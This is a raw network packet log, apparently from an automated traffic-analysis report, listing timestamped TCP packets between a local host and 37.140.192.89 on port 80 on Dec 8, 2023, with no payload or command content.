                                                                                                                                                            Dec 8, 2023 14:51:03.122299910 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122450113 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122493029 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.122508049 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122608900 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.122766972 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122806072 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122951984 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.123063087 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123101950 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123219013 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.123560905 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123600006 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123687983 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.123842955 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123882055 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124037981 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.124422073 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124460936 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124569893 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124607086 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124653101 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.124653101 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.125118971 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.125157118 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.125297070 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.125324965 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.125364065 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.125435114 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400317907 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400424957 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400463104 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400509119 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400547028 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400559902 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400559902 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400584936 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400624037 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400664091 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400674105 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400674105 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400738955 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:04.349975109 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.358691931 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.640043974 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.640137911 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.640383959 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.920202971 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924487114 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924539089 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924654007 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.924757957 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924849033 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.924895048 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.924977064 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925085068 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925129890 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.925363064 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925404072 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925446033 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:05.925816059 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925882101 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:05.925925016 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.204268932 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.204298973 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.204360008 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.204545021 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.204641104 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.204687119 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.204972029 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.205081940 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.205118895 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.205405951 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.205501080 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.205535889 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.205966949 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.206082106 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.206116915 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.206425905 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.206497908 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.206533909 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.206713915 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.206866980 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.206901073 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.207339048 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.207442999 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.207494974 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.207649946 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.207923889 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.208023071 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.208092928 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.208285093 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.208329916 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.483465910 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.483524084 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.483717918 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.483865023 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.483907938 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.483956099 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.484499931 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.484541893 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.484586954 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:06.484966993 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.485025883 CET804975037.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:06.485071898 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:07.154539108 CET4975080192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:08.170504093 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:08.450095892 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.450373888 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:08.451260090 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:08.732419968 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.732762098 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.732774019 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.737591028 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.737643957 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.737729073 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:08.737967968 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.738065958 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.738110065 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:08.738368034 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.738459110 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.738500118 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:08.739259958 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.739377975 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.739422083 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:08.739470959 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.739547014 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:08.739590883 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.017349958 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.017395973 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.017440081 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.017529964 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.017574072 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.017669916 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.017709970 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.017714024 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.017781019 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.017904043 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.017992973 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.018071890 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.018335104 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.018377066 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.018455029 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.018625021 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.018695116 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.018739939 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.018887043 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.018999100 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.019043922 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.019287109 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.019346952 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.019399881 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.019639969 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.019738913 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.019792080 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.019984007 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.020073891 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.020117044 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.296937943 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.297003031 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.297122002 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.297163010 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.297238111 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.297239065 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.297735929 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.297831059 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.297878981 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.298161983 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.298206091 CET804975137.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:09.298259974 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:09.967370033 CET4975180192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:10.983392954 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.265336990 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.265562057 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.265685081 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.547266006 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.548007011 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.548057079 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.548116922 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.548489094 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.548551083 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.548604012 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.549098015 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.549140930 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.549194098 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.549447060 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.549493074 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.549540043 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.550219059 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.550271034 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.550328016 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.829652071 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.829687119 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.829833984 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.829870939 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.829896927 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.829946041 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.830110073 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.830154896 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.830198050 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.830781937 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.830801964 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.830821991 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.830841064 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.830847025 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.830883980 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.831043959 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.831065893 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.831108093 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.831311941 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.831332922 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.831372976 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.831619978 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.831640959 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.831681013 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.832107067 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.832130909 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.832169056 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:11.832242012 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.832281113 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:11.832319975 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.111099958 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.111129999 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.111196041 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.111231089 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.111246109 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.111303091 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.111593962 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.111686945 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.111732960 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.112113953 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.112205029 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.112251997 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.112649918 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.112732887 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.112776041 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.113289118 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.113365889 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.113409996 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.113565922 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.113683939 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.113739014 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.114414930 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.114542007 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.114597082 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.114608049 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.114682913 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.114738941 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.115689993 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115767002 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115804911 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115822077 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.115855932 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115907907 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.115928888 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.115968943 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116007090 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116023064 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.116080046 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116152048 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116158962 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.116221905 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116271973 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.116453886 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116537094 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.116588116 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.117196083 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.117269993 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.117319107 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.117778063 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.117835999 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.117886066 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.118340969 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.118475914 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.118526936 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.118859053 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.119015932 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.119067907 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.119327068 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.119447947 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.119498968 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.392776012 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.392806053 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.392893076 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.392987013 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393029928 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393069029 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.393497944 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393598080 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393637896 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.393683910 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393758059 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.393791914 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.394294977 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394347906 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394387007 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.394408941 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394455910 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394489050 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.394644976 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394766092 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.394802094 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.395117044 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.395266056 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.395312071 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.395385981 CET804975237.140.192.89192.168.2.4
